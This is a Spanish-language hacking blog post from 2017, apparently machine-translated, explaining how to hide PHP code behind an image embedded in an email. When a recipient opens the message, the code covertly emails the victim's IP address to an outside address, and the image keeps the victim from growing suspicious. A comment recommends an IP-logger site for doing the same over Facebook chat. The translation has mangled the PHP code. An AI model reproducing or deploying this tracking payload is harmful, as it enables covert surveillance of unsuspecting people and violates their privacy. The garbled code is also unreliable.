Ocultar código PHP en un Email | KelvinSecurity

junio 24, 2017

Ocultar código PHP en un Email | KelvinSecurity 



Ahora estaremos enviando un correo electrónico con una imagen que obtenemos de un script PHP después de ejecutar algún código.

Lo que necesitarás:
  • servidor web Apache con PHP
  • Una imagen (incluido abajo)
  • Una cuenta de correo electrónico
PASO 1 - Configuración. 



Hacer una carpeta llamada "imagen.jpg" en la carpeta html pública. En su carpeta "imagen.jpg" colocar el archivo "imagen.jpg" y el archivo "index.php".

Imagen de ejemplo:



PASO 2 - Escribir El Código

El contenido de su archivo "index.php" deben ser las siguientes

<? php // cosas a pescado aquí $ imagepath = "imagen.jpg"; $ imagen = imagecreatefromjpeg ($ imagepath); header ( 'Content-Type: image / jpeg'); imagejpeg (imagen $); ?>

Donde dice "cosas // pescado aquí" poner cualquier código de pescado que desea ejecutar:

mail ( "scriptkitty95@gmail.com", "Hax", $ _SERVER [ 'REMOTE_ADDR'] ':'.. $ _SERVER [ 'HTTP_X_FORWARDED_FOR']);
Lo que me mensajes de correo electrónico la dirección IP del usuario.
Paso 3 - Escribir el correo electrónico
Para empezar, la cumplimentación de los campos "a" y "sujetos".



Haga clic en el icono de imagen para añadir una imagen a su correo electrónico.
 


Haga clic en "Dirección web (URL)" y poner la dirección a la carpeta "imagen.jpg" no imagen. Si todo está correctamente configurado, debe aparecer la imagen y una marca de verificación.



Si todo ha ido bien debería ver su imagen en el campo del mensaje. Ahora todo lo que necesita hacer es enviar el correo electrónico y esperar a que alguien para abrirlo. 

Cómo funciona:
Cuando alguien abre el correo electrónico de su navegador ve la etiqueta de la imagen y va a " http://example.com/image.jpg " para obtener la imagen. Cuando el navegador va a " http://example.com/image.jpg " ya que es una carpeta "index.php" se ejecuta como si fueran a la página. Cuando se ejecuta "index.php" se ejecuta el código de pescado a continuación, enviar el contenido al navegador en forma de una imagen que se muestra en el correo electrónico por lo que el usuario no obtiene sospechoso.

Conclusión:
Esto se puede utilizar para obtener las direcciones IP o para hacer cosas


postby. KelvinSecurity
KelvinSecurity FaceBook [ https://www.facebook.com/Ksecureteam/ ]
KelvinSecurity [ http://ksecureteam.com/ ]


, ,
By:
INTELMEX
INTELMEX

This is a short biography of the post author. Maecenas nec odio et ante tincidunt tempus donec vitae sapien ut libero venenatis faucibus nullam quis ante maecenas nec odio et ante tincidunt tempus donec.

2 comentarios:

  1. Unknown26 de junio de 2017, 3:11 p.m.

    Este comentario ha sido eliminado por el autor.

    ResponderBorrar
  2. Unknown26 de junio de 2017, 3:13 p.m.

    Tambien pueden usar http://www.blasze.com y envien el link por el chat de faceb0ok para obtener el ip de la victima, saludos.

    ResponderBorrar

Suscribirse a: Comentarios de la entrada (Atom)